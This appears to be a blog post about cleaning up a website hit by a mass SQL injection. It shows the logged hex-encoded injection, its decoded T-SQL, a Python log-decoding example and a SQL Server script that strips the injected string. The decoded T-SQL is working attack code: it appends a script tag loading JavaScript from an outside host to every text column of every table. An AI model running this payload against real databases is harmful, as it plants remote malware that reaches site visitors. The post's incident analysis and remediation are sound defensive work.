Over the past few days, a friend's website has been hit by malicious injection, and the damage recurs every day. The likely cause is that the program was not written well. Every field in the database has a script tag appended (<Script Src=http://%63%2Enuclear3.com/css/c.js></Script>; the script address may change from time to time). Searching a few search engines for "/css/c.js></Script>" shows that many websites have the same problem. The injection prototype captured from the IIS logs is as follows:
;DECLARE @s NVARCHAR(4000);SET @s=CAST(0x…400650020005400610062006c0065005f0043007500720073006f007200 AS NVARCHAR(4000));EXEC(@s);--
The SQL statement inside the CAST above decodes to the following:
Declare @T Varchar(255),@C Varchar(255)
Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167)
Open Table_Cursor
Fetch Next From Table_Cursor Into @T,@C
While(@@Fetch_Status=0)
Begin
    Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<Script Src=http://%63%2Enuclear3.com/css/c.js></Script>''')
    Fetch Next From Table_Cursor Into @T,@C
End
Close Table_Cursor
Deallocate Table_Cursor
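The decoding step above can be automated when reviewing IIS logs. The following is an added example, not part of the original post: it scans W3C-format log rows for a hex-encoded CAST in the query string and returns the hidden SQL text. The sample log lines, IP addresses and the /news.asp path are constructed for illustration, and the embedded payload is a harmless PRINT statement.

```python
import re
from urllib.parse import unquote_plus

# CAST(0x<hex> AS [N]VARCHAR ...) as it appears once the query string is URL-decoded.
CAST_RE = re.compile(r"cast\s*\(\s*0x([0-9a-f]+)\s+as\s+(n?varchar)", re.IGNORECASE)

def decode_cast_payloads(query_string):
    """Return the SQL text hidden in each hex-encoded CAST in one query string."""
    decoded = []
    for hex_blob, sql_type in CAST_RE.findall(unquote_plus(query_string)):
        raw = bytes.fromhex(hex_blob[: len(hex_blob) // 2 * 2])  # drop a dangling nibble
        if sql_type.lower() == "nvarchar":
            # NVARCHAR literals are UTF-16LE; a truncated log field may end mid-character.
            decoded.append(raw[: len(raw) // 2 * 2].decode("utf-16-le", errors="replace"))
        else:
            decoded.append(raw.decode("latin-1"))
    return decoded

def scan_log(lines):
    """Return (client IP, URI stem, decoded SQL) for every log row carrying a payload."""
    fields, hits = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column names for the rows that follow
            continue
        if line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        for sql in decode_cast_payloads(row.get("cs-uri-query", "")):
            hits.append((row.get("c-ip"), row.get("cs-uri-stem"), sql))
    return hits

# Constructed sample data: a benign statement encoded the same way as the logged payload.
SAMPLE_SQL = "PRINT 'constructed sample'"
SAMPLE_HEX = SAMPLE_SQL.encode("utf-16-le").hex().upper()
SAMPLE_LOG = [
    "#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status",
    "2008-01-01 00:00:01 GET /news.asp id=7 192.0.2.10 200",
    "2008-01-01 00:00:02 GET /news.asp id=7;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x"
    + SAMPLE_HEX + "%20AS%20NVARCHAR(4000));EXEC(@S);-- 198.51.100.7 200",
]

if __name__ == "__main__":
    for ip, stem, sql in scan_log(SAMPLE_LOG):
        print(ip, stem, sql)
```

The rows it reports identify which page and parameter accepted the injected statement, which is where the application code needs fixing.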
Summary:
The root cause is still that the program was not written well, which leads to injection. I hope people pay attention to this problem when writing programs in the future; I think that if .NET parameters are used to pass values, the possibility of injection should be zero.
This friend was most afraid of data loss and hoped to recover the data, so I helped him write an SQL script for cleaning the fields (only suitable for SQL Server). I also hope it makes cleaning up other injected websites easier. The code is as follows:
declare @name as nvarchar(128), @columnName as nvarchar(128), @columnType as nvarchar(128), @injectSql as nvarchar(111)
-- Must match the injected string exactly as it appears in the decoded payload
set @injectSql = '<Script Src=http://%63%2Enuclear3.com/css/c.js></Script>'
-- Outer cursor: every user table
declare curLabel cursor for select name from sysobjects where xtype = 'U'
open curLabel
fetch next from curLabel into @name
while @@fetch_status = 0
begin
    -- Inner cursor: every column of the current table
    declare curLabel1 cursor for select column_name, data_type from information_schema.columns where (table_name = @name)
    open curLabel1
    fetch next from curLabel1 into @columnName, @columnType
    while @@fetch_status = 0
    begin
        if (@columnType = 'text' or @columnType = 'ntext')
        begin
            -- text/ntext columns cannot be passed to replace(), so each value is patched in place with updatetext
            begin try
                declare @primaryKey nvarchar(255);
                -- Reset so a table without a primary key does not reuse the previous table's key
                set @primaryKey = null
                select @primaryKey = primaryKey from
                    (select
                        c.name as primaryKey,
                        case when c.colid in (select ik.colid
                                              from sysindexes i, sysindexkeys ik, sysobjects oo
                                              where i.id = ik.id and i.indid = ik.indid
                                                and i.name = oo.name and oo.xtype = 'PK' -- primary key
                                                and o.id = i.id
                                             ) then 1 else 0 end isPrimaryKey
                     from sysobjects o inner join syscolumns c on o.id = c.id
                     where o.xtype = 'U'
                       and o.name = @name) as t where isPrimaryKey = 1
                -- @len is set to the length of the injected string; left NULL, updatetext would delete everything up to the end of the value
                exec('declare @ptr varbinary(16);declare @id nvarchar(16);'
                    +'declare curText scroll Cursor for select textptr('+@columnName+'),'+@primaryKey+' from '+@name+';'
                    +'declare @Position int,@len int;set @len=len('''+@injectSql+''');'
                    +'OPEN curText;FETCH NEXT FROM curText INTO @ptr,@id;'
                    +'WHILE @@FETCH_STATUS=0 BEGIN;'
                    +'select @Position=patindex(''%'+@injectSql+'%'','+@columnName+') from '+@name+' where '+@primaryKey+'=@id;'
                    +'while @Position>0 begin;'
                    +'set @Position=@Position-1;'
                    +'updatetext '+@name+'.'+@columnName+' @ptr @Position @len '''';'
                    +'select @Position=patindex(''%'+@injectSql+'%'','+@columnName+') from '+@name+' where '+@primaryKey+'=@id;'
                    +'end;'
                    +'FETCH NEXT FROM curText INTO @ptr,@id;END;CLOSE curText;DEALLOCATE curText')
            end try
            begin catch
                -- Report the table.column that could not be cleaned
                print(@name+'.'+@columnName)
            end catch
        end
        else
        if (@columnType = 'nvarchar' or @columnType = 'varchar')
            exec('update '+@name+' set '+@columnName+'=replace('+@columnName+','''+@injectSql+''','''')')
        fetch next from curLabel1 into @columnName, @columnType
    end
    close curLabel1
    deallocate curLabel1
    fetch next from curLabel into @name
end
close curLabel
deallocate curLabel